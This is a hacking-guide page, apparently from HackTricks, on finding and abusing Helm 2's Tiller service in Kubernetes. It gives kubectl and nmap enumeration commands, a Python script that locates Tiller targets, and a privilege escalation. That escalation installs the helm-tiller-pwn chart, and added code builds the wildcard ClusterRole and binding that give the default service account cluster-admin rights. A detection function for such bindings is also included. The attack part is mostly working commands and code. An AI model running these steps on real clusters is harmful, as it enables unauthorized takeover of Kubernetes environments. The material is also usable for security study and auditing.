{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Helm is the package manager for Kubernetes. It lets you bundle YAML manifests into packages, called Helm Charts, and distribute them through public and private repositories. Tiller is the in-cluster server component of Helm 2 (Helm 3 removed it): it receives charts from the helm client and applies them to the cluster, and by default it listens on port 44134.
Default port: 44134
PORT STATE SERVICE VERSION
44134/tcp open unknown
Enumeration
If you can list pods and/or services in different namespaces, enumerate them and look for the ones with "tiller" in their name:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Examples:
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
You can also try to find the service by scanning for port 44134:
sudo nmap -sS -p 44134 <IP>
Once you have found it, you can talk to it with the helm client. You can install it with tools like homebrew, or get it from the official releases page; for more details or other options, check the installation guide. Note that the `--host` flag (and `install --name`) belongs to the Helm 2 client: Helm 3 dropped Tiller entirely and cannot talk to it. The cluster DNS name below only resolves from inside the cluster; from outside, use the reachable IP and port instead.
Then you can query the service:
helm --host tiller-deploy.kube-system:44134 version
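An added example (not code from the original page) that turns the enumeration step into a small parser: given the text of `kubectl get services -A` (or the single-namespace form without the NAMESPACE column), it flags services whose name contains "tiller" or that expose TCP/44134 (a Tiller that was renamed but left on its default port) and builds the `--host` value for the Helm 2 client. The sample output, including the `helm-old/charts-api` service, is constructed.

```python
# Added example, not from the original page: find Tiller candidates in
# `kubectl get services` output and build the helm --host target.
import sys

TILLER_PORT = 44134  # Tiller's default gRPC port

# Constructed sample of `kubectl get services -A` output.
SAMPLE_SERVICES = """\
NAMESPACE     NAME           TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
default       kubernetes     ClusterIP   10.96.0.1      <none>        443/TCP                  35m
kube-system   kube-dns       ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
kube-system   tiller-deploy  ClusterIP   10.98.57.159   <none>        44134/TCP                35m
helm-old      charts-api     ClusterIP   10.100.12.7    <none>        44134/TCP,8080/TCP       2d
"""


def parse_services(text, default_namespace="default"):
    """Parse kubectl's table output into dicts. Column positions are taken from
    the header row, so both the -A form (NAMESPACE column) and the single-namespace
    form work; default_namespace is used when the column is absent."""
    lines = [l for l in text.splitlines() if l.strip()]
    if not lines:
        return []
    idx = {col: i for i, col in enumerate(lines[0].split())}
    rows = []
    for line in lines[1:]:
        cols = line.split()
        if len(cols) < len(idx):
            continue  # malformed / wrapped line, skip
        ns = cols[idx["NAMESPACE"]] if "NAMESPACE" in idx else default_namespace
        # PORT(S) looks like "53/UDP,53/TCP,9153/TCP" (or "<none>"); keep the numbers.
        ports = {int(p.split("/")[0]) for p in cols[idx["PORT(S)"]].split(",") if "/" in p}
        rows.append({"namespace": ns, "name": cols[idx["NAME"]],
                     "cluster_ip": cols[idx["CLUSTER-IP"]], "ports": ports})
    return rows


def find_tiller(rows):
    """Return (namespace, name, cluster_ip, port) for every service that is either
    named like Tiller or exposes TCP/44134."""
    hits = []
    for r in rows:
        by_name = "tiller" in r["name"].lower()
        by_port = TILLER_PORT in r["ports"]
        if by_name or by_port:
            # Prefer the default port; fall back to the lowest exposed port for a
            # renamed/re-ported Tiller so the operator still gets something to try.
            port = TILLER_PORT if by_port else (min(r["ports"]) if r["ports"] else TILLER_PORT)
            hits.append((r["namespace"], r["name"], r["cluster_ip"], port))
    return hits


def helm_host(namespace, name, port):
    """Cluster-internal DNS name in the form the Helm 2 client expects for --host."""
    return f"{name}.{namespace}:{port}"


if __name__ == "__main__":
    # Pipe real output in (`kubectl get services -A | python3 this.py`) or run
    # interactively to use the constructed sample.
    text = SAMPLE_SERVICES if sys.stdin.isatty() else sys.stdin.read()
    for ns, name, ip, port in find_tiller(parse_services(text)):
        print(f"helm --host {helm_host(ns, name, port)} version    # ClusterIP {ip}")
```

Matching on the port as well as the name is deliberate: the service name is the first thing an operator renames, the port rarely is.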
Privilege Escalation
By default Helm 2 installed Tiller in the kube-system namespace with a highly privileged service account, and Tiller does not authenticate its clients unless TLS was explicitly configured, so if you find the service and can reach it, it can let you escalate privileges: whatever chart you ask it to install is applied with Tiller's own permissions.
All you need to do is install a chart like this one: https://github.com/Ruil1n/helm-tiller-pwn, which grants the default service account token access to everything in the whole cluster.
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn/pwnchart
In http://rui0.cn/archives/1573 you have the explanation of the attack, but basically, reading the files clusterrole.yaml and clusterrolebinding.yaml inside helm-tiller-pwn/pwnchart/templates/ you can see how all the privileges are granted to the default token.
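As an added example (not code from the original page nor from the helm-tiller-pwn repository, whose exact template text is not reproduced here), the two RBAC objects a chart like that has to create to hand the `default` service account cluster-wide rights, built as plain dicts, plus an audit function that flags any ClusterRoleBinding granting a wildcard ClusterRole (or the built-in cluster-admin) to a service account. The role and binding names, the target namespace argument and the `BENIGN_*` samples are assumptions made for the example.

```python
# Added example, not from the original page or the pwnchart repo: build the
# ClusterRole + ClusterRoleBinding a Tiller-abuse chart needs, and audit for them.
import json


def pwn_rbac_manifests(target_namespace, role_name="pwnchart-admin"):
    """Wildcard ClusterRole bound to the `default` ServiceAccount of target_namespace.
    kubectl apply -f accepts JSON, so json.dumps of these dicts is a valid manifest.
    (Names and the namespace parameter are assumptions; the chart's own templates
    may differ in detail but have to create objects with this effect.)"""
    role = {
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "kind": "ClusterRole",
        "metadata": {"name": role_name},
        "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}],
    }
    binding = {
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "kind": "ClusterRoleBinding",
        "metadata": {"name": f"{role_name}-binding"},
        "roleRef": {"apiGroup": "rbac.authorization.k8s.io",
                    "kind": "ClusterRole", "name": role_name},
        "subjects": [{"kind": "ServiceAccount", "name": "default",
                      "namespace": target_namespace}],
    }
    return role, binding


def is_wildcard_rule(rule):
    """True when a rule grants every verb on every resource in every API group."""
    return all("*" in rule.get(key, []) for key in ("apiGroups", "resources", "verbs"))


def risky_bindings(cluster_roles, bindings):
    """Return (binding, role, subject) for each ClusterRoleBinding that gives a
    ServiceAccount a wildcard ClusterRole or cluster-admin. Feed it the `items`
    of `kubectl get clusterroles -o json` and `kubectl get clusterrolebindings -o json`."""
    wildcard_roles = {"cluster-admin"} | {
        r["metadata"]["name"] for r in cluster_roles
        if any(is_wildcard_rule(rule) for rule in r.get("rules", []))
    }
    findings = []
    for b in bindings:
        ref = b.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") not in wildcard_roles:
            continue
        for s in b.get("subjects", []):
            if s.get("kind") == "ServiceAccount":
                subject = f"system:serviceaccount:{s.get('namespace')}:{s.get('name')}"
                findings.append((b["metadata"]["name"], ref["name"], subject))
    return findings


# Constructed benign objects: a read-only role bound to a monitoring SA must not be flagged.
BENIGN_ROLE = {
    "apiVersion": "rbac.authorization.k8s.io/v1", "kind": "ClusterRole",
    "metadata": {"name": "pod-reader"},
    "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}],
}
BENIGN_BINDING = {
    "apiVersion": "rbac.authorization.k8s.io/v1", "kind": "ClusterRoleBinding",
    "metadata": {"name": "pod-reader-binding"},
    "roleRef": {"apiGroup": "rbac.authorization.k8s.io", "kind": "ClusterRole", "name": "pod-reader"},
    "subjects": [{"kind": "ServiceAccount", "name": "prometheus", "namespace": "monitoring"}],
}


if __name__ == "__main__":
    role, binding = pwn_rbac_manifests("kube-system")
    print(json.dumps([role, binding], indent=2))
    print("flagged:", risky_bindings([role, BENIGN_ROLE], [binding, BENIGN_BINDING]))
```

The point of the attack is that the client needs no RBAC of its own: Tiller renders the chart and applies these objects with its service account. Once the binding exists, every pod in the target namespace that mounts the `default` service account token can call the API server as cluster-admin, which is also what makes the binding easy to spot in an audit of ClusterRoleBindings.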